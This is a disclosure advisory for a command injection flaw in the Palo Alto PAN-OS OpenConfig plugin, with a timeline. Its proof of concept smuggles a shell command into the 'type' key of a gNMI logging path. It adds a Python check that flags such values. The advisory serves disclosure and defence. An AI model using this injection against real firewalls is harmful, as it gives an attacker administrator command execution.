# PaloAlto OpenConfig Plugin: Command Injection Vulnerability

## Package

## Affected versions

## Patched versions

## Description

### Summary

A vulnerability in PAN-OS OpenConfig allows an authenticated user to run arbitrary commands on the underlying OS. The commands are run as device administrator.

### Details

Palo Alto Networks firewalls support retrieval of syslogs through gnmi.Subscribe. With the OpenConfig plugin installed, the following OpenConfig API path can be used with a parameterized XPATH:

`pan-logging:/pan/logging/query/custom[type=system][direction=fwd][max_logs=2][period=last-24-hrs]`

We found that the `type` parameter in the XPATH above can be used to send arbitrary bash commands to be executed on the firewall.

### Severity

High – This vulnerability allows an attacker to run arbitrary bash commands via gnmi.Subscribe.

### Proof of Concept

To exploit this vulnerability, we created a request with the `type` parameter set to a bash command that writes the string `"system"` to a file and reads it back.

#### XPATH

`/pan/logging/query/custom[direction=fwd][max_logs=2][period=last-24-hrs][type=$(echo system > file1; cat file1)]`

#### Request

We used the gnmic tool to test this exploit.

```
./gnmic -a : -u --password= --skip-verify -e json_ietf subscribe --mode once --log --path 'pan-logging:/pan/logging/query/custom[type=$(echo system > file1; cat file1)][direction=fwd][max_logs=2][period=last-24-hrs]'
```

#### Response

```
{
  "source": ":",
  "subscription-name": "",
  "timestamp": ,
  "time": "",
  "updates": [
    {
      "Path": "/pan/logging/query/custom[direction=fwd][max_logs=2][period=last-24-hrs][type=$(echo system \u003e file1; cat file1)]",
      "values": {
        "/pan/logging/query/custom": {
          "code": "200",
          "message": { …
```

`system` is a valid value for the `type` parameter. The response above shows that the server successfully executed the bash commands `echo system > file1; cat file1`, producing the output `system`, which was then passed as the input to the `type` parameter.
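One way to flag such requests in gNMI path logs, as an added example that is not part of the original advisory: it parses the `[key=value]` predicates of a path and reports any value that is not a plain token. The `SAFE_VALUE` pattern and the function names are assumptions made for illustration; the two sample paths are the ones quoted in this advisory.

```python
import re

# Assumption: legitimate key values for this query are plain tokens such as
# "system", "fwd", "2" or "last-24-hrs"; anything else deserves review.
SAFE_VALUE = re.compile(r"[A-Za-z0-9_.-]+")

def path_keys(path):
    """Yield (key, value) for each [key=value] predicate in a gNMI path.

    A backslash escapes the next character, so an escaped ']' inside a
    value does not end the predicate.
    """
    i, n = 0, len(path)
    while i < n:
        if path[i] == "\\":           # escaped character outside a predicate
            i += 2
            continue
        if path[i] != "[":
            i += 1
            continue
        i += 1                        # step past '['
        buf = []
        while i < n and path[i] != "]":
            if path[i] == "\\" and i + 1 < n:
                i += 1                # keep the escaped character literally
            buf.append(path[i])
            i += 1
        i += 1                        # step past the closing ']'
        key, sep, value = "".join(buf).partition("=")
        if sep:
            yield key, value

def suspicious_keys(path):
    """Return the predicates whose value is not a plain token."""
    return [(k, v) for k, v in path_keys(path) if not SAFE_VALUE.fullmatch(v)]

# Paths taken from the advisory text: the documented query and the PoC path.
BENIGN = ("pan-logging:/pan/logging/query/custom"
          "[type=system][direction=fwd][max_logs=2][period=last-24-hrs]")
POC = ("/pan/logging/query/custom[direction=fwd][max_logs=2]"
       "[period=last-24-hrs][type=$(echo system > file1; cat file1)]")

if __name__ == "__main__":
    for p in (BENIGN, POC):
        print(suspicious_keys(p) or "ok", "<-", p)
```

The same check can run as input validation in front of any component that builds a shell command from path keys, rejecting the request instead of logging it.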

#### Preconditions

OpenConfig Plugin is required to run the above exploit.

### Further Analysis

Details of this CVE can be found at: https://security.paloaltonetworks.com/CVE-2025-0110

### Timeline

**Date reported**: 10/17/2024

**Date fixed**: 01/14/2025

**Date disclosed**: 02/19/2025
